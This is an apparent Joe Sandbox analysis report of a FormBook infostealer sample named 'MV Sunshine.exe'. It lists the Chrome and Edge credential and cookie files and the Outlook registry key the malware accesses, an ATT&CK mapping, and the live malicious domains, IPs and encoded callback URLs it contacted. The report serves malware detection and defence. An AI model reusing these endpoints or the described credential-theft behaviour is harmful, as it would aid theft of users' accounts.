Source: oVmFMrJhUAa.exe, 00000003.00000000.2220063219.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000003.00000002.3965821730.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3965974220.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0064886B cpuid

0_2_0064886B

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_006550D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006550D7

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00662230 GetUserNameW,

0_2_00662230

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_0065418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0065418A

Source: C:\Users\user\Desktop\MV Sunshine.exe

Code function: 0_2_00624AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00624AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3966156240.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298353300.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3966567732.0000000002890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3966004188.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3968329130.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298777568.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3964294017.0000000002840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299487480.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\find.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: MV Sunshine.exe	Binary or memory string: WIN_81
Source: MV Sunshine.exe	Binary or memory string: WIN_XP
Source: MV Sunshine.exe	Binary or memory string: WIN_XPe
Source: MV Sunshine.exe	Binary or memory string: WIN_VISTA
Source: MV Sunshine.exe	Binary or memory string: WIN_7
Source: MV Sunshine.exe	Binary or memory string: WIN_8
Source: MV Sunshine.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3966156240.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298353300.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3966567732.0000000002890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3966004188.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3968329130.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2298777568.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3964294017.0000000002840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299487480.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00696596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00696596
Source: C:\Users\user\Desktop\MV Sunshine.exe	Code function: 0_2_00696A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00696A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MV Sunshine.exe	29%	ReversingLabs	Win32.Trojan.AutoitInject
MV Sunshine.exe	24%	Virustotal		Browse
MV Sunshine.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
rtpakuratkribo.xyz	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rtpakuratkribo.xyz	66.29.146.173	true	true	2%, Virustotal, Browse	unknown
www.megaweb8.top	104.21.59.91	true	true		unknown
vnxoso88.art	66.29.146.14	true	true		unknown
www.jigg.space	45.33.30.197	true	true		unknown
www.pluribiz.life	209.74.64.58	true	true		unknown
www.b2iqd.top	20.2.208.137	true	true		unknown
www.gamebaitopzo.fun	172.67.206.245	true	true		unknown
gtml.huksa.huhusddfnsuegcdn.com	206.119.185.225	true	true		unknown
dccf.earth	3.33.130.190	true	true		unknown
natroredirect.natrocdn.com	85.159.66.93	true	true		unknown
www.ipk.app	13.248.169.48	true	true		unknown
wethebeststore.online	91.184.0.200	true	true		unknown
www.vnxoso88.art	unknown	unknown	false		unknown
www.rtpakuratkribo.xyz	unknown	unknown	true		unknown
www.dccf.earth	unknown	unknown	false		unknown
www.wethebeststore.online	unknown	unknown	false		unknown
www.39978.club	unknown	unknown	false		unknown
www.idaschem.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://www.dccf.earth/tqc2/	true	unknown
http://www.megaweb8.top/9tmz/?CR=QnXHBNIHO&C4NDALSx=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVomu3TdCoEKHP3SCjiZu9i/U3COyypdj/Vq8BuTuGkCsmGPVqh+s=	true	unknown
http://www.b2iqd.top/g8fb/	true	unknown
http://www.megaweb8.top/9tmz/	true	unknown
http://www.idaschem.xyz/k45l/?CR=QnXHBNIHO&C4NDALSx=eEsmO3tqxgZhecFuD1iDKSUxkj6BCtqtHYZ6OUA3SqEwtG4TBmhjXYADabhkz5bgV/61+lmRmR6oEEDWXEosNqWwQc39IDQJRjeooDZzyDv7Bh8lrkRR4+ww5Wo2X3lAtFqtU/8=	true	unknown
http://www.jigg.space/ezhm/?C4NDALSx=dQjGhxXMHv5+YwjryQcJrySkOGIlRyTTAmxJxQLZURFTEZTj1YJRXXyzUfzSUuBT8AWS6f5Uz3vbXV/G8YOf4LeGomdb6yirOaA+C9WTgdNIW32ObChxobUuNb9d8YJ7EaJFlMM=&CR=QnXHBNIHO	true	unknown
http://www.rtpakuratkribo.xyz/7m52/	true	unknown
http://www.vnxoso88.art/sciu/?C4NDALSx=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLaTFYxZnfOv9cXS3nSZaLDRiuTmF2RHg/Rxj+O5CgW7JmZlVhRI=&CR=QnXHBNIHO	true	unknown
http://www.ipk.app/phav/?CR=QnXHBNIHO&C4NDALSx=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ0j57X7xdml97HV8TCJTDchmLx+R+oJJ2lMxnc8gWo/b1dM1vSs=	true	unknown
http://www.pluribiz.life/khsn/?C4NDALSx=TXD/9ddHP74eJYFExo0CjTUKkcm39u6VsxdqO5O9CqX8y9tdKNpr+RH/ydKFsRdYIeJS6PQWxoGMZT8zvmt3ARbyn6J1ZPnqMM4jEypbCT5wZptZz1V3DzfdhNy5ByxLujVEuGk=&CR=QnXHBNIHO	true	unknown
http://www.vnxoso88.art/sciu/	true	unknown
http://www.b2iqd.top/g8fb/?C4NDALSx=YIk8BARVWSn/QuGUQnkYsazoDYcX4x9RQfS4QBmHenTb8HDBBCrEcM3ZVamem1jnr3BtnBAXBF5diw+d30Gcstri1K8bQKUwmCuPwlz5Cfst33gL1mGdwQpdqLCFFHTDh8Wu1bM=&CR=QnXHBNIHO	true	unknown
http://www.pluribiz.life/khsn/	true	unknown
http://www.rtpakuratkribo.xyz/7m52/?C4NDALSx=KUfzNxzC0/tkF/Sfag5rxehoMO8NdG75VoGUrTTYHgYMfDszE7nAAPd4WyzgZAEusu3dyfDqSmUHPfAxKZywGisUJnGlYgyjdPiRMJiII+hd/ZWCESvW+s+atoBx4v9eisrA7PU=&CR=QnXHBNIHO	true	unknown
http://www.idaschem.xyz/k45l/	true	unknown
http://www.dccf.earth/tqc2/?CR=QnXHBNIHO&C4NDALSx=EkjiWUwG3ohs+TM4TlGrX762MTxbJNqBztSStbX9jWSqgmIiHV+G9e22XLXvdY+CpYL3+KW1Lj2pkjsh45K8KkKZRC8tNqvToqyUp6DlGvulylRMCidvSnjGJ1LrCV2ZKyQ9V4A=	true	unknown
http://www.ipk.app/phav/	true	unknown
http://www.gamebaitopzo.fun/igdb/	true	unknown
http://www.jigg.space/ezhm/	true	unknown
http://www.39978.club/4bhh/?CR=QnXHBNIHO&C4NDALSx=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4=	true	unknown
http://www.gamebaitopzo.fun/igdb/?C4NDALSx=KXN5KYh60A7gMeE/7y9YbJzEbAj8u76Oa7v3ksdE5fh6bb2RqZZNkEsyTM378ew6A9/zEQ377mgRVV6fU1aJNg1uERy6ZujIlGDYuB/gpk9pFFHdCRPS72+AoRDwRP34Iqc3Ln0=&CR=QnXHBNIHO	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.megaweb8.top	oVmFMrJhUAa.exe, 00000008.00000002.3968329130.00000000051FA000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	find.exe, 00000004.00000002.3967280480.0000000003B86000.00000004.10000000.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3966500688.00000000032E6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www70.jigg.space/	oVmFMrJhUAa.exe, 00000008.00000002.3966500688.0000000003C52000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.jigg.space/ezhm?gp=1&js=1&uuid=1730690345.0000715743&other_args=eyJ1cmkiOiAiL2V6aG0iLCAiY	find.exe, 00000004.00000002.3971076523.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, find.exe, 00000004.00000002.3967280480.00000000044F2000.00000004.10000000.00040000.00000000.sdmp, oVmFMrJhUAa.exe, 00000008.00000002.3966500688.0000000003C52000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	find.exe, 00000004.00000003.2481448752.00000000078DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
20.2.208.137	www.b2iqd.top	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
45.33.30.197	www.jigg.space	United States	63949	LINODE-APLinodeLLCUS	true
206.119.185.225	gtml.huksa.huhusddfnsuegcdn.com	United States	174	COGENT-174US	true
66.29.146.173	rtpakuratkribo.xyz	United States	19538	ADVANTAGECOMUS	true
13.248.169.48	www.ipk.app	United States	16509	AMAZON-02US	true
104.21.59.91	www.megaweb8.top	United States	13335	CLOUDFLARENETUS	true
172.67.206.245	www.gamebaitopzo.fun	United States	13335	CLOUDFLARENETUS	true
209.74.64.58	www.pluribiz.life	United States	31744	MULTIBAND-NEWHOPEUS	true
66.29.146.14	vnxoso88.art	United States	19538	ADVANTAGECOMUS	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
3.33.130.190	dccf.earth	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1548171
Start date and time:	2024-11-04 04:15:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MV Sunshine.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/5@14/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 59 Number of non-executed functions: 270
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target oVmFMrJhUAa.exe, PID 4824 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
22:17:39	API Interceptor	6710656x Sleep call for process: find.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.33.30.197	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	45.33.30.197/
	PI#220824.exe	Get hash	malicious	FormBook	Browse	www.globaart.world/y9w3/
	BL6387457290.exe	Get hash	malicious	FormBook	Browse	www.globaart.world/y9w3/
	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Get hash	malicious	FormBook	Browse	www.meetfactory.biz/m6nq/
	https://widget.acdovery.com/script/13529	Get hash	malicious	Unknown	Browse	widget.acdovery.com/script/13529?gp=1&js=1&uuid=1710496525.0046378740&other_args=eyJ1cmkiOiAiL3NjcmlwdC8xMzUyOSIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0=
	https://fonts.goggleapis.com	Get hash	malicious	Unknown	Browse	fonts.goggleapis.com/?gp=1&js=1&uuid=1708332813.0074160085&other_args=eyJ1cmkiOiAiLyIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0=
	v3Pk16a5xJ.exe	Get hash	malicious	FormBook	Browse	www.monoploygo.wiki/iskm/?qvqLkP=DnM8xjdPmQXukEG/ct3xe01w3oYraVVStgIXscJDle9o38/9IVF6rW+JRaE9WBvAoUXuL1ikwQ5dr0xo3rIRuPLo7pcTzAo3fw==&PDq4=L4NhCxe0UD
	ldg1QwGnSwrKaNu.exe	Get hash	malicious	FormBook, zgRAT	Browse	www.alwayswim.com/nd9s/?p0Y8KzoP=s4teW/+vhXj7AmcnbAz/238POSdejZfwbuM2wv36a97ZYD3ud7X5LXS1q9u99YIyoCvsjPStwPOgG5Uv9/tCjM0fzIsroA1pHw==&rbs=bhAhX8-h7znHxf60
	SDFormatter.exe	Get hash	malicious	Unknown	Browse	mycampusjuice.com/z9r0qh.php?k=l410op94z7hr
	http://www.nice.org/guidance/cg169	Get hash	malicious	Unknown	Browse	www.nice.org/guidance/cg169?gp=1&js=1&uuid=1699363165.0098012384&other_args=eyJ1cmkiOiAiL2d1aWRhbmNlL2NnMTY5IiwgImFyZ3MiOiAiIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjcifQ==
13.248.169.48	New Order list attached.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.virtu.industries/i9b0/
	A4mmSHCUi2.exe	Get hash	malicious	FormBook	Browse	www.thesquare.world/f1ri/
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	www.discountprice.shop/mt2s/
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	www.ila.beauty/izfe/
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	www.hopeisa.live/0iqe/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.ila.beauty/izfe/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.xipowerplay.xyz/akxn/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.xipowerplay.xyz/akxn/
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	www.yanta.org/1nfd/
	INVOICES.exe	Get hash	malicious	FormBook	Browse	www.tangible.online/5byq/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.pluribiz.life	#10302024.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
natroredirect.natrocdn.com	Ponta Saheb. PO 4400049817.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO 45003516.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO-000041522.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	P1 BOL.exe	Get hash	malicious	Unknown	Browse	85.159.66.93
	rBALT-10212024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	General terms and conditions of sale - Valid from 10202024 to 12312024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	request-BPp -RFQ 0975432.exe	Get hash	malicious	PureLog Stealer	Browse	85.159.66.93
	rDebitadvice22_10_2024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO#071024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe	Get hash	malicious	Unknown	Browse	85.159.66.93
gtml.huksa.huhusddfnsuegcdn.com	dzkb5Gfd33.exe	Get hash	malicious	FormBook	Browse	206.119.185.189
	Nowe zam#U00f3wienie zakupu pdf.exe	Get hash	malicious	FormBook	Browse	206.119.185.165
	Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.41.37.250
	Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.41.37.243
	RFQ31072024_August order_pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	154.84.24.46
	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Get hash	malicious	FormBook	Browse	194.41.37.230
	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	194.41.37.232

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	149.51.230.97
	arm5.elf	Get hash	malicious	Mirai	Browse	38.118.59.121
	ppc.elf	Get hash	malicious	Mirai	Browse	204.157.10.204
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	198.242.19.161
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	154.40.28.165
	sora.arm.elf	Get hash	malicious	Mirai	Browse	149.113.146.44
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	38.148.251.40
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	38.95.31.59
	sora.spc.elf	Get hash	malicious	Mirai	Browse	38.169.129.61
	nullnet_load.i686.elf	Get hash	malicious	Mirai	Browse	38.32.36.234
LINODE-APLinodeLLCUS	sora.mips.elf	Get hash	malicious	Mirai	Browse	172.104.45.34
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	139.162.11.98
	Payload 94.75.225.exe	Get hash	malicious	Unknown	Browse	178.79.154.219
	hiss.arm7.elf	Get hash	malicious	Unknown	Browse	139.162.173.19
	hiss.arm.elf	Get hash	malicious	Unknown	Browse	66.228.39.163
	6E7Ca7TNDC.exe	Get hash	malicious	FloodFix	Browse	45.56.79.23
	9aLZtsqjJ7.exe	Get hash	malicious	FloodFix	Browse	45.56.79.23
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	178.79.184.196
	https://flaviarc.com/sphp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/index.php	Get hash	malicious	HTMLPhisher	Browse	50.116.54.61
